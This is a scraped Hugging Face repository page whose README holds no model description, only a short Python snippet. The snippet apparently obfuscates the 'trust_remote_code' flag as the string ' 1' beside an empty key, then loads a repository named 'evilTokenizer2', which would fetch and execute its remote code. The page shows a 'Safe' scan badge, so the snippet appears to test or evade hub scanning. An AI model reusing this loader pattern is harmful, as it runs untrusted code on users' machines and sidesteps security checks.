Hugging Face
Models
Datasets
Spaces
Posts
Docs
Solutions
Pricing
Log In
Sign Up
dortucx
/
nogood4
like
0
TF-Keras
google-tensorflow
TensorFlow
bert
Model card
Files
Files and versions
Community
Use this model
main
nogood4
/
README.md
dortucx
Update README.md
85e3c00
verified
3 months ago
preview
code
|
raw
Copy download link
history
blame
contribute
delete
Safe
346 Bytes
import transformers
config = {
"trust_remote_code":' 1',"":
False
}
yit = transformers.AutoModel.from
_pretrained("evilTokenizer2",
**config)
print(yit)